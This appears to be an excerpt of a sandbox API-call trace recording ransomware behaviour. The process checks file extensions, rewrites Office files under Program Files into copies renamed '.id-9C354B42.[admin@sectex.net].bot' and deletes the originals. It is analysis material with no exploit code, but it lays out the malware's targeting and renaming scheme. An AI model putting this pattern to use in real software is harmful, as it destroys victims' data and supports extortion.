	[0158.520] lstrcmpiW (lpString1=".zip", lpString2=".SAM") returned 1
	[0158.520] lstrlenW (lpString=".rar") returned 4
	[0158.520] lstrcmpiW (lpString1=".rar", lpString2=".SAM") returned -1
	[0158.520] lstrlenW (lpString=".bz2") returned 4
	[0158.520] lstrcmpiW (lpString1=".bz2", lpString2=".SAM") returned -1
	[0158.520] lstrlenW (lpString=".7z") returned 3
	[0158.520] lstrcmpiW (lpString1=".7z", lpString2="SAM") returned -1
	[0158.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLR.SAM") returned 63
	[0158.520] lstrlenW (lpString=".dbf") returned 4
	[0158.520] lstrcmpiW (lpString1=".dbf", lpString2=".SAM") returned -1
	[0158.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLR.SAM") returned 63
	[0158.520] lstrlenW (lpString=".1cd") returned 4
	[0158.520] lstrcmpiW (lpString1=".1cd", lpString2=".SAM") returned -1
	[0158.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLR.SAM") returned 63
	[0158.520] lstrlenW (lpString=".jpg") returned 4
	[0158.521] lstrcmpiW (lpString1=".jpg", lpString2=".SAM") returned -1
	[0158.521] lstrcmpiW (lpString1=".SAM", lpString2=".bot") returned 1
	[0158.521] lstrlenW (lpString="ORG97R.SAM") returned 10
	[0158.521] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ORG97R.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\org97r.sam"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0158.521] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=12704) returned 1
	[0158.521] CloseHandle (hObject=0x388) returned 1
	[0158.521] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ORG97R.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\org97r.sam")) returned 0x20
	[0158.521] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ORG97R.SAM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\org97r.sam.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0158.522] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ORG97R.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\org97r.sam"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0158.522] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.522] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.522] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ORG97R.SAM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\org97r.sam.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0158.523] GetLastError () returned 0x0
	[0158.523] ReadFile (in: hFile=0x388, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x31a0, lpOverlapped=0x0) returned 1
	[0158.550] WriteFile (in: hFile=0x25c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x31b0, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x31b0, lpOverlapped=0x0) returned 1
	[0158.551] ReadFile (in: hFile=0x388, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0158.551] WriteFile (in: hFile=0x25c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0158.551] SetEndOfFile (hFile=0x25c) returned 1
	[0158.551] CloseHandle (hObject=0x25c) returned 1
	[0158.551] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.551] SetEndOfFile (hFile=0x388) returned 1
	[0158.556] CloseHandle (hObject=0x388) returned 1
	[0158.556] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ORG97R.SAM.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0158.607] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ORG97R.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\org97r.sam")) returned 1
	[0158.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ORG97R.SAM") returned 66
	[0158.608] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ORG97R.SAM") returned 66
	[0158.608] lstrlenW (lpString=".doc") returned 4
	[0158.608] lstrcmpiW (lpString1=".doc", lpString2=".SAM") returned -1
	[0158.608] lstrlenW (lpString=".docx") returned 5
	[0158.608] lstrcmpiW (lpString1=".docx", lpString2="R.SAM") returned -1
	[0158.608] lstrlenW (lpString=".pdf") returned 4
	[0158.608] lstrcmpiW (lpString1=".pdf", lpString2=".SAM") returned -1
	[0158.608] lstrlenW (lpString=".xls") returned 4
	[0158.608] lstrcmpiW (lpString1=".xls", lpString2=".SAM") returned 1
	[0158.608] lstrlenW (lpString=".xlsx") returned 5
	[0158.608] lstrcmpiW (lpString1=".xlsx", lpString2="R.SAM") returned -1
	[0158.608] lstrlenW (lpString=".ppt") returned 4
	[0158.608] lstrcmpiW (lpString1=".ppt", lpString2=".SAM") returned -1
	[0158.608] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ORG97R.SAM") returned 66
	[0158.608] lstrlenW (lpString=".zip") returned 4
	[0158.608] lstrcmpiW (lpString1=".zip", lpString2=".SAM") returned 1
	[0158.608] lstrlenW (lpString=".rar") returned 4
	[0158.608] lstrcmpiW (lpString1=".rar", lpString2=".SAM") returned -1
	[0158.608] lstrlenW (lpString=".bz2") returned 4
	[0158.608] lstrcmpiW (lpString1=".bz2", lpString2=".SAM") returned -1
	[0158.608] lstrlenW (lpString=".7z") returned 3
	[0158.608] lstrcmpiW (lpString1=".7z", lpString2="SAM") returned -1
	[0158.608] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ORG97R.SAM") returned 66
	[0158.608] lstrlenW (lpString=".dbf") returned 4
	[0158.608] lstrcmpiW (lpString1=".dbf", lpString2=".SAM") returned -1
	[0158.608] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ORG97R.SAM") returned 66
	[0158.608] lstrlenW (lpString=".1cd") returned 4
	[0158.608] lstrcmpiW (lpString1=".1cd", lpString2=".SAM") returned -1
	[0158.608] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ORG97R.SAM") returned 66
	[0158.608] lstrlenW (lpString=".jpg") returned 4
	[0158.608] lstrcmpiW (lpString1=".jpg", lpString2=".SAM") returned -1
	[0158.609] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ORG97R.SAM") returned 66
	[0158.609] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ORG97R.SAM") returned 66
	[0158.609] lstrlenW (lpString=".doc") returned 4
	[0158.609] lstrcmpiW (lpString1=".doc", lpString2=".SAM") returned -1
	[0158.609] lstrlenW (lpString=".docx") returned 5
	[0158.609] lstrcmpiW (lpString1=".docx", lpString2="R.SAM") returned -1
	[0158.609] lstrlenW (lpString=".pdf") returned 4
	[0158.609] lstrcmpiW (lpString1=".pdf", lpString2=".SAM") returned -1
	[0158.609] lstrlenW (lpString=".xls") returned 4
	[0158.609] lstrcmpiW (lpString1=".xls", lpString2=".SAM") returned 1
	[0158.609] lstrlenW (lpString=".xlsx") returned 5
	[0158.609] lstrcmpiW (lpString1=".xlsx", lpString2="R.SAM") returned -1
	[0158.609] lstrlenW (lpString=".ppt") returned 4
	[0158.609] lstrcmpiW (lpString1=".ppt", lpString2=".SAM") returned -1
	[0158.609] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ORG97R.SAM") returned 66
	[0158.609] lstrlenW (lpString=".zip") returned 4
	[0158.609] lstrcmpiW (lpString1=".zip", lpString2=".SAM") returned 1
	[0158.609] lstrlenW (lpString=".rar") returned 4
	[0158.609] lstrcmpiW (lpString1=".rar", lpString2=".SAM") returned -1
	[0158.609] lstrlenW (lpString=".bz2") returned 4
	[0158.609] lstrcmpiW (lpString1=".bz2", lpString2=".SAM") returned -1
	[0158.609] lstrlenW (lpString=".7z") returned 3
	[0158.609] lstrcmpiW (lpString1=".7z", lpString2="SAM") returned -1
	[0158.609] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ORG97R.SAM") returned 66
	[0158.609] lstrlenW (lpString=".dbf") returned 4
	[0158.609] lstrcmpiW (lpString1=".dbf", lpString2=".SAM") returned -1
	[0158.609] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ORG97R.SAM") returned 66
	[0158.609] lstrlenW (lpString=".1cd") returned 4
	[0158.609] lstrcmpiW (lpString1=".1cd", lpString2=".SAM") returned -1
	[0158.609] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ORG97R.SAM") returned 66
	[0158.609] lstrlenW (lpString=".jpg") returned 4
	[0158.609] lstrcmpiW (lpString1=".jpg", lpString2=".SAM") returned -1
	[0158.610] lstrcmpiW (lpString1=".FAE", lpString2=".bot") returned 1
	[0158.610] lstrlenW (lpString="DELIMDOS.FAE") returned 12
	[0158.610] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMDOS.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\delimdos.fae"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0158.610] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=31120) returned 1
	[0158.610] CloseHandle (hObject=0x3b8) returned 1
	[0158.610] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMDOS.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\delimdos.fae")) returned 0x20
	[0158.610] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMDOS.FAE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\delimdos.fae.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0158.611] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMDOS.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\delimdos.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0158.611] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.611] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.611] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMDOS.FAE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\delimdos.fae.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0158.611] GetLastError () returned 0x0
	[0158.611] ReadFile (in: hFile=0x3b8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x7990, lpOverlapped=0x0) returned 1
	[0158.673] WriteFile (in: hFile=0x1b4, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x79a0, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x79a0, lpOverlapped=0x0) returned 1
	[0158.674] ReadFile (in: hFile=0x3b8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0158.674] WriteFile (in: hFile=0x1b4, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0158.674] SetEndOfFile (hFile=0x1b4) returned 1
	[0158.696] CloseHandle (hObject=0x1b4) returned 1
	[0158.696] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.696] SetEndOfFile (hFile=0x3b8) returned 1
	[0158.698] CloseHandle (hObject=0x3b8) returned 1
	[0158.698] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMDOS.FAE.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0158.737] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMDOS.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\delimdos.fae")) returned 1
	[0158.738] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMDOS.FAE") returned 63
	[0158.738] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMDOS.FAE") returned 63
	[0158.738] lstrlenW (lpString=".doc") returned 4
	[0158.738] lstrcmpiW (lpString1=".doc", lpString2=".FAE") returned -1
	[0158.738] lstrlenW (lpString=".docx") returned 5
	[0158.738] lstrcmpiW (lpString1=".docx", lpString2="S.FAE") returned -1
	[0158.738] lstrlenW (lpString=".pdf") returned 4
	[0158.738] lstrcmpiW (lpString1=".pdf", lpString2=".FAE") returned 1
	[0158.738] lstrlenW (lpString=".xls") returned 4
	[0158.738] lstrcmpiW (lpString1=".xls", lpString2=".FAE") returned 1
	[0158.738] lstrlenW (lpString=".xlsx") returned 5
	[0158.738] lstrcmpiW (lpString1=".xlsx", lpString2="S.FAE") returned -1
	[0158.738] lstrlenW (lpString=".ppt") returned 4
	[0158.738] lstrcmpiW (lpString1=".ppt", lpString2=".FAE") returned 1
	[0158.738] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMDOS.FAE") returned 63
	[0158.738] lstrlenW (lpString=".zip") returned 4
	[0158.738] lstrcmpiW (lpString1=".zip", lpString2=".FAE") returned 1
	[0158.738] lstrlenW (lpString=".rar") returned 4
	[0158.738] lstrcmpiW (lpString1=".rar", lpString2=".FAE") returned 1
	[0158.738] lstrlenW (lpString=".bz2") returned 4
	[0158.738] lstrcmpiW (lpString1=".bz2", lpString2=".FAE") returned -1
	[0158.738] lstrlenW (lpString=".7z") returned 3
	[0158.738] lstrcmpiW (lpString1=".7z", lpString2="FAE") returned -1
	[0158.738] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMDOS.FAE") returned 63
	[0158.739] lstrlenW (lpString=".dbf") returned 4
	[0158.739] lstrcmpiW (lpString1=".dbf", lpString2=".FAE") returned -1
	[0158.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMDOS.FAE") returned 63
	[0158.739] lstrlenW (lpString=".1cd") returned 4
	[0158.739] lstrcmpiW (lpString1=".1cd", lpString2=".FAE") returned -1
	[0158.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMDOS.FAE") returned 63
	[0158.739] lstrlenW (lpString=".jpg") returned 4
	[0158.739] lstrcmpiW (lpString1=".jpg", lpString2=".FAE") returned 1
	[0158.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMDOS.FAE") returned 63
	[0158.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMDOS.FAE") returned 63
	[0158.739] lstrlenW (lpString=".doc") returned 4
	[0158.739] lstrcmpiW (lpString1=".doc", lpString2=".FAE") returned -1
	[0158.739] lstrlenW (lpString=".docx") returned 5
	[0158.739] lstrcmpiW (lpString1=".docx", lpString2="S.FAE") returned -1
	[0158.739] lstrlenW (lpString=".pdf") returned 4
	[0158.739] lstrcmpiW (lpString1=".pdf", lpString2=".FAE") returned 1
	[0158.739] lstrlenW (lpString=".xls") returned 4
	[0158.739] lstrcmpiW (lpString1=".xls", lpString2=".FAE") returned 1
	[0158.739] lstrlenW (lpString=".xlsx") returned 5
	[0158.739] lstrcmpiW (lpString1=".xlsx", lpString2="S.FAE") returned -1
	[0158.739] lstrlenW (lpString=".ppt") returned 4
	[0158.739] lstrcmpiW (lpString1=".ppt", lpString2=".FAE") returned 1
	[0158.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMDOS.FAE") returned 63
	[0158.739] lstrlenW (lpString=".zip") returned 4
	[0158.739] lstrcmpiW (lpString1=".zip", lpString2=".FAE") returned 1
	[0158.739] lstrlenW (lpString=".rar") returned 4
	[0158.739] lstrcmpiW (lpString1=".rar", lpString2=".FAE") returned 1
	[0158.739] lstrlenW (lpString=".bz2") returned 4
	[0158.739] lstrcmpiW (lpString1=".bz2", lpString2=".FAE") returned -1
	[0158.739] lstrlenW (lpString=".7z") returned 3
	[0158.739] lstrcmpiW (lpString1=".7z", lpString2="FAE") returned -1
	[0158.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMDOS.FAE") returned 63
	[0158.740] lstrlenW (lpString=".dbf") returned 4
	[0158.740] lstrcmpiW (lpString1=".dbf", lpString2=".FAE") returned -1
	[0158.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMDOS.FAE") returned 63
	[0158.740] lstrlenW (lpString=".1cd") returned 4
	[0158.740] lstrcmpiW (lpString1=".1cd", lpString2=".FAE") returned -1
	[0158.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMDOS.FAE") returned 63
	[0158.740] lstrlenW (lpString=".jpg") returned 4
	[0158.740] lstrcmpiW (lpString1=".jpg", lpString2=".FAE") returned 1
	[0158.740] lstrcmpiW (lpString1=".FAE", lpString2=".bot") returned 1
	[0158.740] lstrlenW (lpString="OLAPPT.FAE") returned 10
	[0158.740] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLAPPT.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\olappt.fae"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0159.228] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=122280) returned 1
	[0159.228] CloseHandle (hObject=0x3f0) returned 1
	[0159.228] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLAPPT.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\olappt.fae")) returned 0x20
	[0159.228] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLAPPT.FAE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\olappt.fae.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.228] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLAPPT.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\olappt.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0159.236] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.237] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.237] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLAPPT.FAE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\olappt.fae.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0159.237] GetLastError () returned 0x0
	[0159.237] ReadFile (in: hFile=0x1b4, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x1dda8, lpOverlapped=0x0) returned 1
	[0159.241] WriteFile (in: hFile=0x25c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x1ddb0, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x1ddb0, lpOverlapped=0x0) returned 1
	[0159.244] ReadFile (in: hFile=0x1b4, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0159.244] WriteFile (in: hFile=0x25c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0159.244] SetEndOfFile (hFile=0x25c) returned 1
	[0159.244] CloseHandle (hObject=0x25c) returned 1
	[0159.244] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.244] SetEndOfFile (hFile=0x1b4) returned 1
	[0159.248] CloseHandle (hObject=0x1b4) returned 1
	[0159.248] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLAPPT.FAE.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0159.248] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLAPPT.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\olappt.fae")) returned 1
	[0159.249] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLAPPT.FAE") returned 61
	[0159.249] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLAPPT.FAE") returned 61
	[0159.249] lstrlenW (lpString=".doc") returned 4
	[0159.249] lstrcmpiW (lpString1=".doc", lpString2=".FAE") returned -1
	[0159.249] lstrlenW (lpString=".docx") returned 5
	[0159.249] lstrcmpiW (lpString1=".docx", lpString2="T.FAE") returned -1
	[0159.249] lstrlenW (lpString=".pdf") returned 4
	[0159.249] lstrcmpiW (lpString1=".pdf", lpString2=".FAE") returned 1
	[0159.249] lstrlenW (lpString=".xls") returned 4
	[0159.249] lstrcmpiW (lpString1=".xls", lpString2=".FAE") returned 1
	[0159.249] lstrlenW (lpString=".xlsx") returned 5
	[0159.249] lstrcmpiW (lpString1=".xlsx", lpString2="T.FAE") returned -1
	[0159.249] lstrlenW (lpString=".ppt") returned 4
	[0159.249] lstrcmpiW (lpString1=".ppt", lpString2=".FAE") returned 1
	[0159.249] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLAPPT.FAE") returned 61
	[0159.249] lstrlenW (lpString=".zip") returned 4
	[0159.249] lstrcmpiW (lpString1=".zip", lpString2=".FAE") returned 1
	[0159.249] lstrlenW (lpString=".rar") returned 4
	[0159.249] lstrcmpiW (lpString1=".rar", lpString2=".FAE") returned 1
	[0159.250] lstrlenW (lpString=".bz2") returned 4
	[0159.250] lstrcmpiW (lpString1=".bz2", lpString2=".FAE") returned -1
	[0159.250] lstrlenW (lpString=".7z") returned 3
	[0159.250] lstrcmpiW (lpString1=".7z", lpString2="FAE") returned -1
	[0159.250] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLAPPT.FAE") returned 61
	[0159.250] lstrlenW (lpString=".dbf") returned 4
	[0159.250] lstrcmpiW (lpString1=".dbf", lpString2=".FAE") returned -1
	[0159.250] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLAPPT.FAE") returned 61
	[0159.250] lstrlenW (lpString=".1cd") returned 4
	[0159.250] lstrcmpiW (lpString1=".1cd", lpString2=".FAE") returned -1
	[0159.250] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLAPPT.FAE") returned 61
	[0159.250] lstrlenW (lpString=".jpg") returned 4
	[0159.250] lstrcmpiW (lpString1=".jpg", lpString2=".FAE") returned 1
	[0159.250] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLAPPT.FAE") returned 61
	[0159.250] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLAPPT.FAE") returned 61
	[0159.250] lstrlenW (lpString=".doc") returned 4
	[0159.250] lstrcmpiW (lpString1=".doc", lpString2=".FAE") returned -1
	[0159.250] lstrlenW (lpString=".docx") returned 5
	[0159.250] lstrcmpiW (lpString1=".docx", lpString2="T.FAE") returned -1
	[0159.250] lstrlenW (lpString=".pdf") returned 4
	[0159.250] lstrcmpiW (lpString1=".pdf", lpString2=".FAE") returned 1
	[0159.250] lstrlenW (lpString=".xls") returned 4
	[0159.250] lstrcmpiW (lpString1=".xls", lpString2=".FAE") returned 1
	[0159.250] lstrlenW (lpString=".xlsx") returned 5
	[0159.250] lstrcmpiW (lpString1=".xlsx", lpString2="T.FAE") returned -1
	[0159.250] lstrlenW (lpString=".ppt") returned 4
	[0159.250] lstrcmpiW (lpString1=".ppt", lpString2=".FAE") returned 1
	[0159.250] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLAPPT.FAE") returned 61
	[0159.250] lstrlenW (lpString=".zip") returned 4
	[0159.250] lstrcmpiW (lpString1=".zip", lpString2=".FAE") returned 1
	[0159.250] lstrlenW (lpString=".rar") returned 4
	[0159.251] lstrcmpiW (lpString1=".rar", lpString2=".FAE") returned 1
	[0159.251] lstrlenW (lpString=".bz2") returned 4
	[0159.251] lstrcmpiW (lpString1=".bz2", lpString2=".FAE") returned -1
	[0159.251] lstrlenW (lpString=".7z") returned 3
	[0159.251] lstrcmpiW (lpString1=".7z", lpString2="FAE") returned -1
